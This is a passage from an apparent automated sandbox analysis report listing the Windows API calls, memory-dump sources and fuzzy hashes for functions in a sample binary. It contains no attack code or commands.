                                                    • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                    • String ID:
                                                    • API String ID: 4082120231-0
                                                    • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                    • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                    • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                    • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                    • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                    • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 2027346449-0
                                                    • Opcode ID: 7cdefffd16f9e0be9b38984aa58d14b591901f04b3f33eeccf5bf40e87674113
                                                    • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                    • Opcode Fuzzy Hash: 7cdefffd16f9e0be9b38984aa58d14b591901f04b3f33eeccf5bf40e87674113
                                                    • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • GetMenu.USER32 ref: 0047A703
                                                    • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                    • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                    • _wcslen.LIBCMT ref: 0047A79E
                                                    • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                    • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                    • String ID:
                                                    • API String ID: 3257027151-0
                                                    • Opcode ID: fb13d82cc146d1e758beec8d4391eb4325a70a0a41cf77ad705cb1ebe11bd533
                                                    • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                    • Opcode Fuzzy Hash: fb13d82cc146d1e758beec8d4391eb4325a70a0a41cf77ad705cb1ebe11bd533
                                                    • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                    APIs
                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastselect
                                                    • String ID:
                                                    • API String ID: 215497628-0
                                                    • Opcode ID: 8aa2eb3f3df720354a9e9a8f9290abb7d1a11705e6024be9ce6568ed17a5f946
                                                    • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                    • Opcode Fuzzy Hash: 8aa2eb3f3df720354a9e9a8f9290abb7d1a11705e6024be9ce6568ed17a5f946
                                                    • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                    APIs
                                                    • GetParent.USER32(?), ref: 0044443B
                                                    • GetKeyboardState.USER32(?), ref: 00444450
                                                    • SetKeyboardState.USER32(?), ref: 004444A4
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                    • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                    • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                    • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00444633
                                                    • GetKeyboardState.USER32(?), ref: 00444648
                                                    • SetKeyboardState.USER32(?), ref: 0044469C
                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                    • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                    • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                    • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                    APIs
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                    • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                    • String ID:
                                                    • API String ID: 2354583917-0
                                                    • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                    • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                    • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                    • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                    • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                    • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$FreeLoad
                                                    • String ID: #v
                                                    • API String ID: 2449869053-554117064
                                                    • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                    • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                    • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                    • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                    • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                    • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                    • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                    • String ID:
                                                    • API String ID: 896007046-0
                                                    • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                    • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                    • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                    • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                    APIs
                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                    • GetFocus.USER32 ref: 00448ACF
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                    • String ID:
                                                    • API String ID: 3429747543-0
                                                    • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                    • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                    • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                    • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                    APIs
                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 3300667738-0
                                                    • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                    • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                    • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                    • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu$\VH
                                                    • API String ID: 3164766367-2432546070
                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 3850602802-3636473452
                                                    • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                    • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                    • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                    • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
